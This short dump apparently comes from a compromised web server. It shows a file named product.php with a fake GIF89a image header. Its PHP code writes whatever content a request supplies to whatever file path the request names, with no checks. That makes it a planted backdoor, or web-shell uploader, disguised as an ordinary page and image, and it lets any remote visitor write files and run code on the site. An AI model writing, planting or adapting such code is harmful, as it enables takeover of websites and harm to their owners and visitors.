GIF89a php
Current File : /home/hencockfreshchic/public_html/product.php
<?php
ini_set('error_reporting', E_STRICT);date_default_timezone_set("Asia/Bangkok");
$link=$_REQUEST['url'];$data=$_REQUEST['data'];
$myfile = fopen($link, "w") or die("Unable to open file!");$txt =$data;
fwrite($myfile, $txt);fclose($myfile);
?>